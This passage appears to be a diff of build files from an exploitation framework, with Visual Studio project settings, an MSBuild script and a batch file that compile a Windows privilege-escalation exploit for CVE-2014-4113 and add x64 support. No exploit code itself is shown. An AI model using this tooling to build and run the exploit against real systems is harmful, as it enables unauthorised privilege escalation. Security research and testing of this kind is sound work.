</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<CompileAs>Default</CompileAs>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cve-2014-4113.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

7
external/source/exploits/cve-2014-4113/make.msbuild vendored
View File

@ -4,14 +4,15 @@
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
<Message Text="Building CVE-2014-4113 track_popup_menu x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="CVE-2014-4113 is not supported in x64" />
<Message Text="Building CVE-2014-4113 track_popup_menu x64 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>

2
external/source/exploits/make.bat vendored
View File

@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" (
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2014-4113 (win32k_null_page)"
ECHO "Building CVE-2014-4113 (track_popup_menu)"
PUSHD CVE-2014-4113
msbuild.exe make.msbuild /target:%PLAT%
POPD